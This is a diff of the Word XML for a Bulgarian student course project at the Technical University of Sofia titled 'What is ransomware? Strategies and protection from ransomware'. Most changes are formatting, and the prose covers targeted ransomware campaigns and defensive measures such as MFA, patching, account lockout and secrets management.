+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>spray</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pray</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>“, при който зловредният софтуер се разпространява масово, без конкретен избор на жертва. Вместо това започват да таргетират конкретни организации и потребители</w:t>
       </w:r>
       <w:r>
         <w:t>, или известно още като</w:t>
@@ -3478,12 +3714,14 @@
       <w:r>
         <w:t xml:space="preserve"> и </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>TravelEx</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>, заплатили съответно 600 000</w:t>
       </w:r>
@@ -3539,7 +3777,15 @@
         <w:t xml:space="preserve">BGH. </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Започва през едно инфектирано устройство и се разпространява към всички възможни системи в мрежата. Процесът се повтаря, докато се заразяват възможно най-много системи. После се деплойва </w:t>
+        <w:t xml:space="preserve">Започва през едно инфектирано устройство и се разпространява към всички възможни системи в мрежата. Процесът се повтаря, докато се заразяват възможно най-много системи. После се </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>деплойва</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3561,7 +3807,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc223346805"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc223346845"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Стратегии и защита от </w:t>
@@ -3580,7 +3826,15 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Настоящите препоръки за превенция и реакция при ransomware атаки се базират на оперативния опит на организации като CISA, NSA, FBI и MS-ISAC. Насоките са предназначени както за ИТ специалисти, така и за лица, участващи в </w:t>
+        <w:t xml:space="preserve">Настоящите препоръки за превенция и реакция при </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> атаки се базират на оперативния опит на организации като CISA, NSA, FBI и MS-ISAC. Насоките са предназначени както за ИТ специалисти, така и за лица, участващи в </w:t>
       </w:r>
       <w:r>
         <w:t>изготвянето</w:t>
@@ -3615,7 +3869,7 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc223346806"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc223346846"/>
       <w:r>
         <w:t xml:space="preserve">Подготовка за </w:t>
       </w:r>
@@ -3800,7 +4054,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc223346807"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc223346847"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Превенция </w:t>
@@ -3893,7 +4147,15 @@
         <w:t xml:space="preserve"> също е от ключово значение</w:t>
       </w:r>
       <w:r>
-        <w:t>. Особено сканове за тези устройства, които са свързани към интернета, за да се ограничи атаката.</w:t>
+        <w:t xml:space="preserve">. Особено </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>сканове</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> за тези устройства, които са свързани към интернета, за да се ограничи атаката.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -3916,7 +4178,15 @@
         <w:t>OS</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> свързани с процесването на интернет данни – уеб </w:t>
+        <w:t xml:space="preserve"> свързани с </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>процесването</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> на интернет данни – уеб </w:t>
       </w:r>
       <w:r>
         <w:t>браузери</w:t>
@@ -3997,7 +4267,15 @@
         <w:t xml:space="preserve"> cloud providers</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> следи за уязвимости, пачва системи и има защити против </w:t>
+        <w:t xml:space="preserve"> следи за уязвимости, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>пачва</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> системи и има защити против </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4264,15 +4542,15 @@
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="11" w:name="_Toc223346808"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc223346848"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Компрометирани </w:t>
       </w:r>
+      <w:r>
+        <w:t>пароли</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="11"/>
-      <w:r>
-        <w:t>пароли</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4324,7 +4602,15 @@
         <w:t xml:space="preserve">Multi factor authentication </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">заменят процеса с двете пароли към аутентикация с пръстов отпечатък, лицево разпознаване, ПИН на устройството или криптографичен ключ. </w:t>
+        <w:t xml:space="preserve">заменят процеса с двете пароли към аутентикация с пръстов отпечатък, лицево разпознаване, ПИН на устройството или </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>криптографичен</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ключ. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4367,7 +4653,15 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Подмяна на админските пароли. Често по време на разработка на дадена услуга/апликация, програмистите използват пароли, които са известни на целия екип, за да си улеснят работния процес. Това е приемливо, когато продуктът не е деплойнат и само се тестват функционалностите. Ако тези пароли останат в </w:t>
+        <w:t xml:space="preserve">Подмяна на админските пароли. Често по време на разработка на дадена услуга/апликация, програмистите използват пароли, които са известни на целия екип, за да си улеснят работния процес. Това е приемливо, когато продуктът не е </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>деплойнат</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и само се тестват функционалностите. Ако тези пароли останат в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4434,7 +4728,15 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Имплементация на заключване на акаунти при множество неуспешни опити. Логване и мониторинг на опитите за логин е необходимо за разпознаване на </w:t>
+        <w:t xml:space="preserve">Имплементация на заключване на акаунти при множество неуспешни опити. Логване и мониторинг на опитите за </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>логин</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> е необходимо за разпознаване на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4477,17 +4779,30 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t>хаширащи алгоритми.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>хаширащи</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> алгоритми.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Едно такова решение е имплементацията на </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>HashiCorp Vault. Vault</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HashiCorp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Vault. Vault</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> е система за чувствителна информация – пароли, </w:t>
@@ -4499,7 +4814,15 @@
         <w:t>API</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> ключове, токени, </w:t>
+        <w:t xml:space="preserve"> ключове, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>токени</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4526,7 +4849,15 @@
         <w:t>hardcoded</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> пароли, споделени пароли, частни ключове в гит и ръчна ротация. Данните в </w:t>
+        <w:t xml:space="preserve"> пароли, споделени пароли, частни ключове в </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>гит</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и ръчна ротация. Данните в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4543,8 +4874,13 @@
         </w:rPr>
         <w:t xml:space="preserve">audit </w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">логове. Поддържа </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>логове</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Поддържа </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4617,7 +4953,7 @@
         <w:t>(Фиг. 10 – диаграма защо използването на пароли по подразбиране не е препоръчително)</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkStart w:id="12" w:name="_Toc223346809" w:displacedByCustomXml="next"/>
+    <w:bookmarkStart w:id="12" w:name="_Toc223346849" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -16,22 +16,21 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C385950" wp14:editId="28C72A68">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07A7AEAA" wp14:editId="6B5F4D5B">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>485140</wp:posOffset>
+              <wp:posOffset>5365115</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>-68580</wp:posOffset>
+              <wp:posOffset>-151130</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="353695" cy="370205"/>
-            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+            <wp:extent cx="1005753" cy="641350"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
             <wp:wrapNone/>
-            <wp:docPr id="6" name="Picture 1" descr="A black background with a black square&#10;&#10;Description automatically generated with medium confidence"/>
+            <wp:docPr id="579471419" name="Picture 1" descr="Academi"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -39,7 +38,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 1" descr="A black background with a black square&#10;&#10;Description automatically generated with medium confidence"/>
+                    <pic:cNvPr id="0" name="Picture 1" descr="Academi"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -60,12 +59,15 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="353695" cy="370205"/>
+                      <a:ext cx="1005753" cy="641350"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
                     <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -73,7 +75,62 @@
             <wp14:sizeRelH relativeFrom="margin">
               <wp14:pctWidth>0</wp14:pctWidth>
             </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="page">
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="3EE879DA" wp14:editId="4FBD861B">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-407035</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-169545</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="752475" cy="755015"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="6985"/>
+            <wp:wrapNone/>
+            <wp:docPr id="5" name="image1.jpg"/>
+            <wp:cNvGraphicFramePr/>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="image1.jpg"/>
+                    <pic:cNvPicPr preferRelativeResize="0"/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="752475" cy="755015"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
               <wp14:pctHeight>0</wp14:pctHeight>
             </wp14:sizeRelV>
           </wp:anchor>
@@ -90,7 +147,7 @@
           <w:szCs w:val="32"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ТЕХНИЧЕСКИ  УНИВЕРСИТЕТ – СОФИЯ</w:t>
+        <w:t>Технически  Университет – София</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -225,91 +282,255 @@
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
-          <w:sz w:val="52"/>
-          <w:szCs w:val="52"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
-          <w:sz w:val="52"/>
-          <w:szCs w:val="52"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Програмни технологии за сигурен код</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
+        <w:t>Какво</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="52"/>
-          <w:szCs w:val="52"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="52"/>
-          <w:szCs w:val="52"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Курсов</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="52"/>
-          <w:szCs w:val="52"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="52"/>
-          <w:szCs w:val="52"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>проект</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="52"/>
-          <w:szCs w:val="52"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:kern w:val="0"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>представлява</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ransomware? </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Стратегии</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>защита</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>от</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:val="en-US"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ransomware.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Курсов</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>проект</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>по</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>„Програмни технологии за сигурен код“</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="0"/>
@@ -317,72 +538,7 @@
           <w:szCs w:val="40"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>„</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Какво представлява </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">? Стратегии и защита от </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -422,29 +578,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
